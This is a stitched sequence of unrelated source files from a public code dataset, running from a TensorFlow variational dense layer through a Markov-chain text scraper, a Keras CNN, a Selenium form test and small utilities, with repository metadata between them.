scale = (np.finfo(dtype.as_numpy_dtype).eps +\n nn_ops.softplus(untransformed_scale))\n return loc, scale\n return _fn\n\n\ndef default_mean_field_normal_fn(\n is_singular=False,\n loc_initializer=None,\n untransformed_scale_initializer=None,\n loc_regularizer=None,\n untransformed_scale_regularizer=None,\n loc_constraint=None,\n untransformed_scale_constraint=None):\n \"\"\"Creates a function to build Normal distributions with trainable params.\n\n This function produces a closure which produces `tf.distributions.Normal`\n parameterized by a loc` and `scale` each created using `tf.get_variable`. The\n produced closure accepts the following arguments:\n\n name: Python `str` name prepended to any created (or existing)\n `tf.Variable`s.\n shape: Python `list`-like representing the parameter's event shape.\n dtype: Type of parameter's event.\n trainable: Python `bool` indicating all created `tf.Variable`s should be\n added to the graph collection `GraphKeys.TRAINABLE_VARIABLES`.\n add_variable_fn: `tf.get_variable`-like `callable` used to create (or\n access existing) `tf.Variable`s.\n\n Args:\n is_singular: Python `bool` if `True`, forces the special case limit of\n `scale->0`, i.e., a `Deterministic` distribution.\n loc_initializer: Initializer function for the `loc` parameters.\n If `None` (default), values are initialized using the default\n initializer used by `tf.get_variable`.\n untransformed_scale_initializer: Initializer function for the `scale`\n parameters. If `None` (default), values are initialized using the default\n initializer used by `tf.get_variable`.\n loc_regularizer: Regularizer function for the `loc` parameters.\n untransformed_scale_regularizer: Regularizer function for the `scale`\n parameters.\n loc_constraint: An optional projection function to be applied to the\n loc after being updated by an `Optimizer`. The function must take as input\n the unprojected variable and must return the projected variable (which\n must have the same shape). Constraints are not safe to use when doing\n asynchronous distributed training.\n untransformed_scale_constraint: An optional projection function to be\n applied to the `scale` parameters after being updated by an `Optimizer`\n (e.g. used to implement norm constraints or value constraints). The\n function must take as input the unprojected variable and must return the\n projected variable (which must have the same shape). Constraints are not\n safe to use when doing asynchronous distributed training.\n\n Returns:\n make_normal_fn: Python `callable` which creates a `tf.distributions.Normal`\n using from args: `dtype, shape, name, trainable, add_variable_fn`.\n \"\"\"\n loc_scale_fn_ = default_loc_scale_fn(\n is_singular,\n loc_initializer,\n untransformed_scale_initializer,\n loc_regularizer,\n untransformed_scale_regularizer,\n loc_constraint,\n untransformed_scale_constraint)\n def _fn(dtype, shape, name, trainable, add_variable_fn):\n \"\"\"Creates a batch of `Deterministic` or `Normal` distributions.\"\"\"\n loc, scale = loc_scale_fn_(dtype, shape, name, trainable, add_variable_fn)\n if scale is None:\n return deterministic_lib.Deterministic(loc=loc)\n return normal_lib.Normal(loc=loc, scale=scale)\n return _fn\n\n\nclass DenseVariational(layers_lib.Layer):\n \"\"\"Densely-connected variational class.\n\n This layer implements the Bayesian variational inference analogue to:\n `outputs = activation(matmul(inputs, kernel) + bias)`\n by assuming the `kernel` and/or the `bias` are random variables.\n\n The layer implements a stochastic dense calculation by making a Monte Carlo\n approximation of a [variational Bayesian method based on KL divergence](\n https://en.wikipedia.org/wiki/Variational_Bayesian_methods), i.e.,\n\n ```none\n -log p(y|x) = -log int_{R**d} p(y|x,w) p(w) dw\n = -log int_{R**d} p(y,w|x) q(w|x) / q(w|x) dw\n <= E_q(W|x)[-log p(y,W|x) + log q(W|x)] # Jensen's\n = E_q(W|x)[-log p(y|x,W)] + KL[q(W|x), p(W)]\n ~= m**-1 sum{ -log(y|x,w[j]) : w[j] ~ q(W|x), j=1..m }\n + KL[q(W|x), p(W)]\n ```\n\n where `W` denotes the (independent) `kernel` and `bias` random variables, `w`\n is a random variate or outcome of `W`, `y` is the label, `x` is the evidence`,\n and `~=` denotes an approximation which becomes exact as `m->inf`. The above\n bound is sometimes referred to as the negative Evidence Lower BOund or\n negative [ELBO](https://arxiv.org/abs/1601.00670). In context of a DNN, this\n layer is appropriate to use when the final loss is a negative log-likelihood.\n\n The Monte-Carlo sum portion is used for the feed-forward calculation of the\n DNN. The KL divergence portion can be added to the final loss via:\n `loss += sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))`.\n\n The arguments permit separate specification of the surrogate posterior\n (`q(W|x)`), prior (`p(W)`), and divergence for both the `kernel` and `bias`\n random variables (which together comprise `W`).\n\n Args:\n units: Integer or Long, dimensionality of the output space.\n activation: Activation function (`callable`). Set it to None to maintain a\n linear activation.\n activity_regularizer: Regularizer function for the output.\n trainable: Boolean, if `True` also add variables to the graph collection\n `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n kernel_use_local_reparameterization: Python `bool` indicating whether\n `kernel` calculation should employ the Local Reparameterization Trick.\n When `True`, `kernel_posterior_fn` must create an instance of\n `tf.distributions.Normal`.\n kernel_posterior_fn: Python `callable` which creates\n `tf.distributions.Distribution` instance representing the surrogate\n posterior of the `kernel` parameter. Default value:\n `default_mean_field_normal_fn()`.\n kernel_posterior_tensor_fn: Python `callable` which takes a\n `tf.distributions.Distribution` instance and returns a representative\n value. Default value: `lambda d: d.sample()`.\n kernel_prior_fn: Python `callable` which creates `tf.distributions`\n instance. See `default_mean_field_normal_fn` docstring for required\n parameter signature.\n Default value: `tf.distributions.Normal(loc=0., scale=1.)`.\n kernel_divergence_fn: Python `callable` which takes the surrogate posterior\n distribution, prior distribution and random variate sample(s) from the\n surrogate posterior and computes or approximates the KL divergence. The\n distributions are `tf.distributions.Distribution`-like instances and the\n sample is a `Tensor`.\n bias_posterior_fn: Python `callable` which creates\n `tf.distributions.Distribution` instance representing the surrogate\n posterior of the `bias` parameter. Default value:\n `default_mean_field_normal_fn(is_singular=True)` (which creates an\n instance of `tf.distributions.Deterministic`).\n bias_posterior_tensor_fn: Python `callable` which takes a\n `tf.distributions.Distribution` instance and returns a representative\n value. Default value: `lambda d: d.sample()`.\n bias_prior_fn: Python `callable` which creates `tf.distributions` instance.\n See `default_mean_field_normal_fn` docstring for required parameter\n signature. Default value: `None` (no prior, no variational inference)\n bias_divergence_fn: Python `callable` which takes the surrogate posterior\n distribution, prior distribution and random variate sample(s) from the\n surrogate posterior and computes or approximates the KL divergence. The\n distributions are `tf.distributions.Distribution`-like instances and the\n sample is a `Tensor`.\n name: Python `str`, the name of the layer. Layers with the same name will\n share `tf.Variable`s, but to avoid mistakes we require `reuse=True` in\n such cases.\n reuse: Python `bool`, whether to reuse the `tf.Variable`s of a previous\n layer by the same name.\n\n Properties:\n units: Python integer, dimensionality of the output space.\n activation: Activation function (`callable`).\n activity_regularizer: Regularizer function for the output.\n kernel_use_local_reparameterization: Python `bool` indicating whether\n `kernel` calculation should employ the Local Reparameterization Trick.\n kernel: `VariationalKernelParamater` instance containing all `kernel`\n related properties and `callable`s.\n bias: `VariationalParameter` instance containing all `kernel`\n related properties and `callable`s.\n \"\"\"\n\n def __init__(\n self,\n units,\n activation=None,\n activity_regularizer=None,\n trainable=True,\n kernel_use_local_reparameterization=True,\n kernel_posterior_fn=default_mean_field_normal_fn(),\n kernel_posterior_tensor_fn=lambda d: d.sample(),\n kernel_prior_fn=lambda dtype, *args: normal_lib.Normal( # pylint: disable=g-long-lambda\n loc=dtype.as_numpy_dtype(0.), scale=dtype.as_numpy_dtype(1.)),\n kernel_divergence_fn=lambda q, p, ignore: kl_lib.kl_divergence(q, p),\n bias_posterior_fn=default_mean_field_normal_fn(is_singular=True),\n bias_posterior_tensor_fn=lambda d: d.sample(),\n bias_prior_fn=None,\n bias_divergence_fn=lambda q, p, ignore: kl_lib.kl_divergence(q, p),\n name=None,\n **kwargs):\n super(DenseVariational, self).__init__(\n trainable=trainable,\n name=name,\n activity_regularizer=activity_regularizer,\n **kwargs)\n self._units = units\n self._activation = activation\n self._input_spec = layers_lib.InputSpec(min_ndim=2)\n self._kernel_use_local_reparameterization = (\n kernel_use_local_reparameterization)\n self._kernel = VariationalKernelParameter(\n kernel_posterior_fn,\n kernel_posterior_tensor_fn,\n kernel_prior_fn,\n kernel_divergence_fn)\n self._bias = VariationalParameter(\n bias_posterior_fn,\n bias_posterior_tensor_fn,\n bias_prior_fn,\n bias_divergence_fn)\n\n @property\n def units(self):\n return self._units\n\n @property\n def activation(self):\n return self._activation\n\n @property\n def input_spec(self):\n return self._input_spec\n\n @input_spec.setter\n def input_spec(self, value):\n self._input_spec = value\n\n @property\n def kernel_use_local_reparameterization(self):\n return self._kernel_use_local_reparameterization\n\n @property\n def kernel(self):\n return self._kernel\n\n @property\n def bias(self):\n return self._bias\n\n def build(self, input_shape):\n input_shape = tensor_shape.TensorShape(input_shape)\n in_size = input_shape.with_rank_at_least(2)[-1].value\n if in_size is None:\n raise ValueError(\"The last dimension of the inputs to `Dense` \"\n \"should be defined. Found `None`.\")\n self._input_spec = layers_lib.InputSpec(min_ndim=2, axes={-1: in_size})\n dtype = dtypes.as_dtype(self.dtype)\n\n # Must have a posterior kernel.\n self.kernel.posterior = self.kernel.posterior_fn(\n dtype, [in_size, self.units], \"kernel_posterior\",\n self.trainable, self.add_variable)\n\n if self.kernel.prior_fn is None:\n self.kernel_prior = None\n else:\n self.kernel.prior = self.kernel.prior_fn(\n dtype, [in_size, self.units], \"kernel_prior\",\n self.trainable, self.add_variable)\n self._built_kernel_divergence = False\n\n if self.bias.posterior_fn is None:\n self.bias.posterior = None\n else:\n self.bias.posterior = self.bias.posterior_fn(\n dtype, [self.units], \"bias_posterior\",\n self.trainable, self.add_variable)\n\n if self.bias.prior_fn is None:\n self.bias.prior = None\n else:\n self.bias.prior = self.bias.prior_fn(\n dtype, [self.units], \"bias_prior\",\n self.trainable, self.add_variable)\n self._built_bias_divergence = False\n\n self.built = True\n\n def call(self, inputs):\n inputs = ops.convert_to_tensor(inputs, dtype=self.dtype)\n\n outputs = self._apply_variational_kernel(inputs)\n outputs = self._apply_variational_bias(outputs)\n if self.activation is not None:\n outputs = self.activation(outputs) # pylint: disable=not-callable\n if not self._built_kernel_divergence:\n self._apply_divergence(self.kernel, name=\"divergence_kernel\")\n self._built_kernel_divergence = True\n if not self._built_bias_divergence:\n self._apply_divergence(self.bias, name=\"divergence_bias\")\n self._built_bias_divergence = True\n return outputs\n\n def _apply_variational_kernel(self, inputs):\n if not self.kernel_use_local_reparameterization:\n self.kernel.posterior_tensor = self.kernel.posterior_tensor_fn(\n self.kernel.posterior)\n self.kernel.posterior_affine = None\n self.kernel.posterior_affine_tensor = None\n return self._matmul(inputs, self.kernel.posterior_tensor)\n if not isinstance(self.kernel.posterior, normal_lib.Normal):\n raise TypeError(\"`kernel_use_local_reparameterization=True` requires \"\n \"`kernel_posterior_fn` produce an instance of \"\n \"`tf.distributions.Normal` (saw: \\\"{}\\\").\".format(\n type(self.kernel.posterior).__name__))\n self.kernel.posterior_affine = normal_lib.Normal(\n loc=self._matmul(inputs, self.kernel.posterior.loc),\n scale=standard_ops.sqrt(self._matmul(\n standard_ops.square(inputs),\n standard_ops.square(self.kernel.posterior.scale))))\n self.kernel.posterior_affine_tensor = (\n self.kernel.posterior_tensor_fn(self.kernel.posterior_affine))\n self.kernel.posterior_tensor = None\n return self.kernel.posterior_affine_tensor\n\n def _apply_variational_bias(self, inputs):\n if self.bias.posterior is None:\n self.bias.posterior_tensor = None\n return inputs\n self.bias.posterior_tensor = self.bias.posterior_tensor_fn(\n self.bias.posterior)\n return nn.bias_add(inputs, self.bias.posterior_tensor)\n\n def _apply_divergence(self, param, name):\n if (param.divergence_fn is None or\n param.posterior is None or\n param.prior is None):\n param.divergence = None\n return\n param.divergence = standard_ops.identity(\n param.divergence_fn(\n param.posterior, param.prior, param.posterior_tensor),\n name=name)\n self.add_loss(param.divergence)\n\n def _matmul(self, inputs, kernel):\n if inputs.shape.ndims <= 2:\n return standard_ops.matmul(inputs, kernel)\n # To handle broadcasting, we must use `tensordot`.\n return standard_ops.tensordot(inputs, kernel, axes=[[-1], [0]])\n\n def _compute_output_shape(self, input_shape):\n input_shape = tensor_shape.TensorShape(input_shape).with_rank_at_least(2)\n if input_shape[-1].value is None:\n raise ValueError(\n \"The innermost dimension of input_shape must be defined, \"\n \"but saw: {}\".format(input_shape))\n return input_shape[:-1].concatenate(self.units)\n\n\ndef dense_variational(\n inputs,\n units,\n activation=None,\n activity_regularizer=None,\n trainable=True,\n kernel_use_local_reparameterization=True,\n kernel_posterior_fn=default_mean_field_normal_fn(),\n kernel_posterior_tensor_fn=lambda d: d.sample(),\n kernel_prior_fn=lambda dtype, *args: normal_lib.Normal( # pylint: disable=g-long-lambda\n loc=dtype.as_numpy_dtype(0.), scale=dtype.as_numpy_dtype(1.)),\n kernel_divergence_fn=lambda q, p, ignore: kl_lib.kl_divergence(q, p),\n bias_posterior_fn=default_mean_field_normal_fn(is_singular=True),\n bias_posterior_tensor_fn=lambda d: d.sample(),\n bias_prior_fn=None,\n bias_divergence_fn=lambda q, p, ignore: kl_lib.kl_divergence(q, p),\n name=None,\n reuse=None):\n \"\"\"Densely-connected variational layer.\n\n This layer implements the Bayesian variational inference analogue to:\n `outputs = activation(matmul(inputs, kernel) + bias)`\n by assuming the `kernel` and/or the `bias` are random variables.\n\n The layer implements a stochastic dense calculation by making a Monte Carlo\n approximation of a [variational Bayesian method based on KL divergence](\n https://en.wikipedia.org/wiki/Variational_Bayesian_methods), i.e.,\n\n ```none\n -log p(y|x) = -log int_{R**d} p(y|x,w) p(w) dw\n = -log int_{R**d} p(y,w|x) q(w|x) / q(w|x) dw\n <= E_q(W|x)[-log p(y,W|x) + log q(W|x)] # Jensen's\n = E_q(W|x)[-log p(y|x,W)] + KL[q(W|x), p(W)]\n ~= m**-1 sum{ -log(y|x,w[j]) : w[j] ~ q(W|x), j=1..m }\n + KL[q(W|x), p(W)]\n ```\n\n where `W` denotes the (independent) `kernel` and `bias` random variables, `w`\n is a random variate or outcome of `W`, `y` is the label, `x` is the evidence`,\n and `~=` denotes an approximation which becomes exact as `m->inf`. The above\n bound is sometimes referred to as the negative Evidence Lower BOund or\n negative [ELBO](https://arxiv.org/abs/1601.00670). In context of a DNN, this\n layer is appropriate to use when the final loss is a negative log-likelihood.\n\n The Monte-Carlo sum portion is used for the feed-forward calculation of the\n DNN. The KL divergence portion can be added to the final loss via:\n `loss += sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))`.\n\n The arguments permit separate specification of the surrogate posterior\n (`q(W|x)`), prior (`p(W)`), and divergence for both the `kernel` and `bias`\n random variables (which together comprise `W`).\n\n Args:\n inputs: Tensor input.\n units: Integer or Long, dimensionality of the output space.\n activation: Activation function (`callable`). Set it to None to maintain a\n linear activation.\n activity_regularizer: Regularizer function for the output.\n trainable: Boolean, if `True` also add variables to the graph collection\n `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n kernel_use_local_reparameterization: Python `bool` indicating whether\n `kernel` calculation should employ the Local Reparameterization Trick.\n When `True`, `kernel_posterior_fn` must create an instance of\n `tf.distributions.Normal`.\n kernel_posterior_fn: Python `callable` which creates\n `tf.distributions.Distribution` instance representing the surrogate\n posterior of the `kernel` parameter. Default value:\n `default_mean_field_normal_fn()`.\n kernel_posterior_tensor_fn: Python `callable` which takes a\n `tf.distributions.Distribution` instance and returns a representative\n value. Default value: `lambda d: d.sample()`.\n kernel_prior_fn: Python `callable` which creates `tf.distributions`\n instance. See `default_mean_field_normal_fn` docstring for required\n parameter signature.\n Default value: `tf.distributions.Normal(loc=0., scale=1.)`.\n kernel_divergence_fn: Python `callable` which takes the surrogate posterior\n distribution, prior distribution and random variate sample(s) from the\n surrogate posterior and computes or approximates the KL divergence. The\n distributions are `tf.distributions.Distribution`-like instances and the\n sample is a `Tensor`.\n bias_posterior_fn: Python `callable` which creates\n `tf.distributions.Distribution` instance representing the surrogate\n posterior of the `bias` parameter. Default value:\n `default_mean_field_normal_fn(is_singular=True)` (which creates an\n instance of `tf.distributions.Deterministic`).\n bias_posterior_tensor_fn: Python `callable` which takes a\n `tf.distributions.Distribution` instance and returns a representative\n value. Default value: `lambda d: d.sample()`.\n bias_prior_fn: Python `callable` which creates `tf.distributions` instance.\n See `default_mean_field_normal_fn` docstring for required parameter\n signature. Default value: `None` (no prior, no variational inference)\n bias_divergence_fn: Python `callable` which takes the surrogate posterior\n distribution, prior distribution and random variate sample(s) from the\n surrogate posterior and computes or approximates the KL divergence. The\n distributions are `tf.distributions.Distribution`-like instances and the\n sample is a `Tensor`.\n name: Python `str`, the name of the layer. Layers with the same name will\n share `tf.Variable`s, but to avoid mistakes we require `reuse=True` in\n such cases.\n reuse: Python `bool`, whether to reuse the `tf.Variable`s of a previous\n layer by the same name.\n\n Returns:\n output: `Tensor` representing a the affine transformed input under a random\n draw from the surrogate posterior distribution.\n \"\"\"\n layer = DenseVariational(\n units,\n activation=activation,\n activity_regularizer=activity_regularizer,\n trainable=trainable,\n kernel_use_local_reparameterization=(\n kernel_use_local_reparameterization),\n kernel_posterior_fn=kernel_posterior_fn,\n kernel_posterior_tensor_fn=kernel_posterior_tensor_fn,\n kernel_prior_fn=kernel_prior_fn,\n kernel_divergence_fn=kernel_divergence_fn,\n bias_posterior_fn=bias_posterior_fn,\n bias_posterior_tensor_fn=bias_posterior_tensor_fn,\n bias_prior_fn=bias_prior_fn,\n bias_divergence_fn=bias_divergence_fn,\n name=name,\n dtype=inputs.dtype.base_dtype,\n _scope=name,\n _reuse=reuse)\n return layer.apply(inputs)\n\n\nclass NotSet(object):\n \"\"\"Helper to track whether a `VariationalParameter` value has been set.\"\"\"\n pass\n\n\nclass VariationalParameter(object):\n \"\"\"Struct-like container of variational parameter properties.\n\n A `VariationalParameter` is intitialized with Python `callable`s which set the\n value of correspondingly named members. Corresponding values have \"set once\"\n semantics, i.e., once set to any value they are immutable.\n \"\"\"\n\n def __init__(\n self,\n posterior_fn,\n posterior_tensor_fn,\n prior_fn,\n divergence_fn):\n \"\"\"Creates the `VariationalParameter` struct-like object.\n\n Args:\n posterior_fn: Python `callable` which creates a\n `tf.distribution.Distribution` like object representing the posterior\n distribution. See `VariationalParameter.posterior_fn` for `callable`'s\n required parameters.\n posterior_tensor_fn: Python `callable` which computes a `Tensor`\n which represents the `posterior`.\n prior_fn: Python `callable` which creates a\n `tf.distribution.Distribution` like object representing the prior\n distribution. See `VariationalParameter.prior_fn` for `callable`'s\n required parameters.\n divergence_fn: Python `callable` which computes the KL divergence from\n `posterior` to `prior`. See `VariationalParameter.divergence_fn` for\n required `callable`'s parameters.\n \"\"\"\n self._posterior_fn = posterior_fn\n self._posterior = NotSet()\n self._posterior_tensor_fn = posterior_tensor_fn\n self._posterior_tensor = NotSet()\n self._prior_fn = prior_fn\n self._prior = NotSet()\n self._divergence_fn = divergence_fn\n self._divergence = NotSet()\n self._init_helper()\n\n @property\n def posterior_fn(self):\n \"\"\"`callable` which creates `tf.distributions.Distribution`-like posterior.\n\n The `callable` must accept the following parameters:\n name: Python `str` name prepended to any created (or existing)\n `tf.Variable`s.\n shape: Python `list`-like representing the parameter's event shape.\n dtype: Type of parameter's event.\n trainable: Python `bool` indicating all created `tf.Variable`s should be\n added to the graph collection `GraphKeys.TRAINABLE_VARIABLES`.\n add_variable_fn: `tf.get_variable`-like `callable` used to create (or\n access existing) `tf.Variable`s.\n\n Returns:\n posterior_fn: The Python `callable` specified in `__init__`.\n \"\"\"\n return self._posterior_fn\n\n @property\n def posterior(self):\n \"\"\"`tf.distributions.Distribution`-like instance representing posterior.\"\"\"\n return self._posterior\n\n @posterior.setter\n def posterior(self, value):\n \"\"\"One-time setter of the `posterior` distribution.\"\"\"\n if not isinstance(self._posterior, NotSet):\n raise ValueError(\"Cannot override already set attribute.\")\n self._posterior = value\n\n @property\n def posterior_tensor_fn(self):\n \"\"\"Creates `Tensor` representing the `posterior` distribution.\n\n The `callable` must accept the following parameters:\n posterior: `tf.distributions.Distribution`-like instance.\n\n Returns:\n posterior_tensor_fn: The Python `callable` specified in\n `__init__`.\n \"\"\"\n return self._posterior_tensor_fn\n\n @property\n def posterior_tensor(self):\n \"\"\"`Tensor` representing the `posterior` distribution.\"\"\"\n return self._posterior_tensor\n\n @posterior_tensor.setter\n def posterior_tensor(self, value):\n \"\"\"One-time setter of the `posterior_tensor`.\"\"\"\n if not isinstance(self._posterior_tensor, NotSet):\n raise ValueError(\"Cannot override already set attribute.\")\n self._posterior_tensor = value\n\n @property\n def prior_fn(self):\n \"\"\"`callable` which creates `tf.distributions.Distribution`-like prior.\n\n The `callable` must accept the following parameters:\n name: Python `str` name prepended to any created (or existing)\n `tf.Variable`s.\n shape: Python `list`-like representing the parameter's event shape.\n dtype: Type of parameter's event.\n trainable: Python `bool` indicating all created `tf.Variable`s should be\n added to the graph collection `GraphKeys.TRAINABLE_VARIABLES`.\n add_variable_fn: `tf.get_variable`-like `callable` used to create (or\n access existing) `tf.Variable`s.\n\n Returns:\n prior_fn: The Python `callable` specified in `__init__`.\n \"\"\"\n return self._prior_fn\n\n @property\n def prior(self):\n \"\"\"`tf.distributions.Distribution`-like instance representing posterior.\"\"\"\n return self._prior\n\n @prior.setter\n def prior(self, value):\n \"\"\"One-time setter of the `prior` distribution.\"\"\"\n if not isinstance(self._prior, NotSet):\n raise ValueError(\"Cannot override already set attribute.\")\n self._prior = value\n\n @property\n def divergence_fn(self):\n \"\"\"`callable` which computes KL-divergence `Tensor` from posterior to prior.\n\n The `callable` must accept the following parameters:\n posterior: `tf.distributions.Distribution`-like instance.\n prior: `tf.distributions.Distribution`-like instance.\n posterior_tensor: `Tensor` representing value of posterior.\n\n Returns:\n divergence_fn: The Python `callable` specified in `__init__`.\n \"\"\"\n return self._divergence_fn\n\n @property\n def divergence(self):\n \"\"\"`Tensor` representing KL-divergence from posterior to prior.\"\"\"\n return self._divergence\n\n @divergence.setter\n def divergence(self, value):\n \"\"\"One-time setter of the `divergence`.\"\"\"\n if not isinstance(self._divergence, NotSet):\n raise ValueError(\"Cannot override already set attribute.\")\n self._divergence = value\n\n def _init_helper(self):\n pass\n\n\nclass VariationalKernelParameter(VariationalParameter):\n \"\"\"Struct-like container of variational kernel properties.\n\n A `VariationalKernelParameter` is intitialized with Python `callable`s which\n set the value of correspondingly named members. Corresponding values have \"set\n once\" semantics, i.e., once set to any value they are immutable.\n \"\"\"\n\n @property\n def posterior_affine(self):\n \"\"\"`tf.distributions.Distribution` affine transformed posterior.\"\"\"\n return self._posterior_affine\n\n @posterior_affine.setter\n def posterior_affine(self, value):\n \"\"\"One-time setter of `posterior_affine`.\"\"\"\n if not isinstance(self._posterior_affine, NotSet):\n raise ValueError(\"Cannot override already set attribute.\")\n self._posterior_affine = value\n\n @property\n def posterior_affine_tensor(self):\n \"\"\"`Tensor` representing the `posterior_affine` distribution.\"\"\"\n return self._posterior_affine_tensor\n\n @posterior_affine_tensor.setter\n def posterior_affine_tensor(self, value):\n \"\"\"One-time setter of the `posterior_affine_tensor`.\"\"\"\n if not isinstance(self._posterior_affine_tensor, NotSet):\n raise ValueError(\"Cannot override already set attribute.\")\n self._posterior_affine_tensor = value\n\n def _init_helper(self):\n self._posterior_affine = NotSet()\n self._posterior_affine_tensor = NotSet()\n","repo_name":"jakajacky/TensorFlowLite_Demo","sub_path":"tensorflow-master/tensorflow/contrib/bayesflow/python/ops/layers_dense_variational_impl.py","file_name":"layers_dense_variational_impl.py","file_ext":"py","file_size_in_byte":33040,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"61"} +{"seq_id":"31027854945","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport sys\nfrom collections import defaultdict\nfrom random import randint\nimport pickle\n\nSITE = \"http://www.satirev.org\"\n\n\ndef check_status(code):\n \"exits the program if page couldn't be reached\"\n if code != 200:\n print(\"failed to retrieve page\")\n exit(1)\n\n\nif __name__ == \"__main__\":\n # Command line args. Defaults to taking just first page. If there is one arg then\n # Takes pages 0-arg. If there are two args, takes pages arg1-arg2.\n if len(sys.argv) == 1:\n page_min = 0\n page_max = 1\n elif len(sys.argv) == 2:\n page_min = 0\n page_max = int(sys.argv[1])\n else:\n page_min = int(sys.argv[1])\n page_max = int(sys.argv[2])\n\n article_texts = [] # we build up a list of all the paragraphs in each article\n for page_num in range(page_min, page_max):\n print(\"processing page index:\", page_num)\n # get all the links on a front page tab\n request = requests.get(f\"{SITE}/us?page={page_num}#.Xk2RKxNKh25\")\n check_status(request.status_code)\n soup = BeautifulSoup(request.content, \"html.parser\")\n # convert them to proper links\n links = [\n article.find(\"a\")[\"href\"] for article\n in soup.find_all(\"div\", id=re.compile(\"node-*\"))\n ]\n for link in links:\n article_page = requests.get(SITE + link) # get an article\n check_status(request.status_code)\n article_soup = BeautifulSoup(article_page.content, \"html.parser\")\n article_texts.append(\"\\n\".join([\n p.text for p\n in article_soup.find(\"div\", id=\"article-content\").find_all(\"p\")\n ]))\n # get a list of all the words in all the articles\n words = re.split(\"[ \\n\\t,.;:\\\"'!?]\", \"\\n\".join(article_texts).lower())\n\n # propogate the markov chain\n markov = defaultdict(lambda: (0, defaultdict(int)))\n for ind, word in enumerate(words[:-1]):\n appearences, word_distribution = markov[word]\n word_distribution[words[ind+1]] += 1\n markov[word] = (appearences+1, word_distribution)\n\n # use the markov chain to predict text\n generated_text = [\"the\"]\n for _ in range(400):\n last_word = generated_text[-1]\n appearences, word_distribution = markov[last_word]\n dart = randint(0, appearences)\n for word, weight in word_distribution.items():\n dart -= weight\n if dart <= 0:\n generated_text.append(word)\n break\n\n# you should pickle the markov chain for later use\n\n print(len(generated_text))\n with open(\"./output.txt\", \"w\") as f:\n f.write(\" \".join(generated_text))\n","repo_name":"jonah-harvard/Jonah_Fried_round1","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21305678592","text":"def myMin(someList):\n\n if type(someList)!=list:\n return False\n\n # we now know that someList is a list\n \n if someList==[]:\n return False\n\n # we now know that there is at least one element in the list\n # in other words: someList[0] exists!\n\n result = someList[0] # initial assumption about the min\n\n for x in someList:\n if (x < result):\n result = x\n \n return result\n\n\n","repo_name":"UCSB-CMPTGCS20-S16/CMPTGCS20-S16-Lecture-05.03-Accumulators-Recursion","sub_path":"myMin.py","file_name":"myMin.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29405954414","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 30 00:29:34 2019\n\n@author: Himanshu\n\"\"\"\n\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Dense\nfrom keras.layers import Flatten\nfrom keras.layers import Dropout\n\ndef cnn_model():\n \n classifier = Sequential()\n\n classifier.add(Convolution2D(24, 3, 3, input_shape = (124, 124, 3), activation = 'relu'))\n \n classifier.add(MaxPooling2D(pool_size=(2, 2)))\n\n classifier.add(Convolution2D(24, 3, 3, activation = 'relu'))\n \n classifier.add(MaxPooling2D(pool_size=(2, 2)))\n \n classifier.add(Convolution2D(34, 3, 3, activation = 'relu'))\n \n classifier.add(MaxPooling2D(pool_size=(2, 2)))\n \n classifier.add(Flatten())\n \n classifier.add(Dense(output_dim = 40, activation = 'relu'))\n \n classifier.add(Dropout(0.2))\n \n classifier.add(Dense(output_dim = 1, activation = 'sigmoid')) \n \n classifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n \n return classifier","repo_name":"himan16/Notes-Classifier","sub_path":"notesClassifier.py","file_name":"notesClassifier.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40824926531","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nimport random\r\nimport string\r\nimport time\r\n\r\nletters = string.ascii_uppercase\r\ntry:\r\n browser = webdriver.Chrome()\r\n browser.get(\"http://suninjuly.github.io/registration1.html\")\r\n inputs = browser.find_elements(By.TAG_NAME, 'input') # List of text fields\r\n for input in inputs:\r\n input.send_keys(''.join(random.choice(letters) for _ in range(8)))\r\n input.send_keys(\"random_word\")\r\n\r\n button = browser.find_element(By.CSS_SELECTOR, \" div button\")\r\n time.sleep(10) # waiting to visually evaluate the results of the script passing\r\n button.click()\r\n\r\n welcome_text_elt = browser.find_element(By.TAG_NAME, \"h1\")\r\n welcome_text = welcome_text_elt.text\r\n\r\n assert \"Congratulations! You have successfully registered!\" == welcome_text\r\n\r\nfinally:\r\n browser.quit()","repo_name":"RubanQA/stepik_qa_automation","sub_path":"stepik_test_automation_course/Unit1/lesson-1-6-10.py","file_name":"lesson-1-6-10.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32056691174","text":"import sys\nimport math\nimport copy\nfrom typing import Tuple, List, Union\ninput = sys.stdin.readline\n\nimport re\n\ndef main():\n N, X = map(int, input().rstrip().split())\n for _ in range(N):\n x = X\n a = int(input().rstrip())\n for _ in range(a - 1):\n x = int(x / 2)\n if x % 2 == 1:\n print(1)\n else:\n print(0)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MokkeMeguru/dsa","sub_path":"aoj/temps/binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70119258756","text":"import yfinance as yf\nimport streamlit as st\nimport datetime as dt \nfrom dateutil.relativedelta import relativedelta\n\n\nst.title(\"Stock Price Checker\")\nst.header(\"Apple, Google and Tesla\")\n\n\ntoday = dt.date.today()\nyears_ago = today-relativedelta(years=10)\n\n#define tickers\ntickers = yf.Tickers('tsla aapl googl')\n#get the historical prices for this ticker\ntickerDf = tickers.history(period='20y')\n# Open\tHigh\tLow\tClose\tVolume\tDividends\tStock 